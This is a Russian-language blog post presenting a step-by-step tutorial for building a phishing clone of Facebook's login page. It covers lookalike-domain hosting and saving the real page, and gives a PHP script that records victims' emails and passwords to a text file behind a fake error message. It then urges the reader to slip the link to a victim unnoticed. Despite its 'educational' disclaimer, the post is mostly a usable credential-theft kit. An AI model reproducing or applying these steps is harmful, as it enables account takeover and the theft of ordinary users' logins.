Статья перепечатана из Блога Opium7 исключительно для повышения безопасности facebook.
Внимание!!! Весь следующий материал опубликован исключительно в УЧЕБНО-ПОЗНАВАТЕЛЬНЫХ целях и, если кому то взбредёт в голову взламывать чужие страницы приведенным ниже способом, автор не виноват. Перед прочтением данного материала я всем настоятельно рекомендую ознакомится со статьями 272 и 274 Уголовного Кодекса Российской Федерации.
Плюс ко всему ещё хочу сказать, что данная статья подойдет не всем, а только тем, кто имеет хоть какое-нибудь представление о сайтостроении и программировании на языке php.
Для начала немного теории. Существует множество способов взломать аккаунт в социальной сети: можно просидеть целую вечность подбирая пароли, можно бесконечно мучить программный код социальной сети в поисках ошибок, можно связать владельца аккаунта и пытать его, пока не скажет пароль:) и т. д. В этой маленькой заметке я не собираюсь рассматривать их все, а расскажу только об одном способе - фишинге.
* Фишинг - это вид интернет мошенничества который подразумевает создание сайта внешне неотличимого от настоящего и после попадания пользователя на поддельную страницу мошенники всячески пытаются побудить пользователя ввести на ней свой логин и пароль, которые он использует для получения доступа к сайту и бессовестно крадут эти данные.
Да, такое бывает сплошь и рядом. Часто, в процессе работы в интернете, мы совершенно не замечаем, что и куда вводим и поэтому риск попадания на фишинговую страницу достаточно велик.
Теперь к делу. Сейчас я покажу, как можно создать фишинговую страницу и слямзить пароль и логин пользователя на примере социальной сети Facebook.
Шаг 1.
Сначала нам понадобится сервер с поддержкой php, я бы посоветовал бесплатный хостинг www.Ayola.net. Зарегистрировавшись подаём заявку на создание страницы www.facebook.pz9.ru, хотя впрочем неважно как она будет называться. После этого к вам придёт сообщение на почту, что нужная страница будет создана в течении 15 минут.
Затем качаем FTP клиент FileZilla, чтобы закидывать файлы на сервер. Это можно скачать здесь.
Шаг 2.
Заходим на страницу www.facebook.com, нажимаем в меню браузера Файл > Сохранить как и сохраняем страницу и все прилежащие папки на рабочем столе. Затем я рекомендую переименовать файл "Добро пожаловать на Фейсбук - заходите, регистрируйтесь и находите друзей.htm" в "index.htm".
После открываем с помощью блокнота этот файл и ищем там форму
А дальше запомним , что в форме есть два текстовых поля, которые называются email и password. (это нам впоследствии очень пригодится).
Шаг 3.
Теперь закрываем index.htm и создаём файл write.php, который заполняем следующем php кодом:$fp = fopen("hack.txt", "a"); // Открываем файл в режиме записи
$mytext = $_GET['email']; // Логин
$mytest = $_GET['password']; // Пароль
$test = fwrite($fp, $mytext); // Запись в файл логина
$test = fwrite($fp, $mytest); // Запись в файл пароля
fclose($fp); //Закрытие файла
echo ('Ошибка, запрашиваемая страница не найдена, пройдите по ссылке facebook');
?>
* Здесь и далее под логином подразумевается адрес электронной почты.
Шаг 4.
Проверяем создалась ли наша страничка, если она уже создана, подключаемся к серверу с помощью FTP клиента (адрес сервера и данные для входа вам сообщит хостер при регистрации) и закидываем туда файл index.htm и все что было сохранено браузером в шаге 2 тоже. Затем создаём пустой текстовый файл, называем его hack.txt и тоже кидаем на сервер вместе с файлом write.php.
Шаг 5.
Ну вот собственно и всё, теперь нужно как-нибудь незаметно подкинуть ссылку www.facebook.pz9.ru нашей жертве, но как это сделать решайте сами. Самое главное, что когда жертва введёт свои данные на этой странице, то эти логин и пароль окажутся в файле hack.txt, который лежит на нашем сервере. И если повезёт, то она этого даже и не заметит!
Ну а теперь традиционное "Как это работает?". А работает это очень просто. Когда пользователь вводит свои данные на фальшивой странице и нажимает кнопку "Войти", браузер сохраняет его логин и пароль в переменных email и password соответственно, а затем отправляет методом GET на сервер к нашему php скрипту в файле write.php, который записывает значения этих переменных в файл hack.txt и отправляет пользователю сообщение "Ошибка, запрашиваемая страница не найдена, пройдите по ссылке www.facebook.com". Пользователь спокойно переходит по ссылке и наши злодеяния остаются незамеченными! И остаётся только с помощью FTP клиента скачать файл hack.txt и дело сделано!
В принципе, имея соответствующие знания о веб технологиях это можно реализовать меньше чем за 15 минут. И кроме того этот способ может быть применим абсолютно для любой социалки, нужен только мозг, и растущие из правильного места руки.
Однако если вы простой необразованный юзер, то вам с этим никогда не справится. Сидите и подбирайте пароли.
На сегодня всё, пока...
Комментариев нет:
Отправить комментарий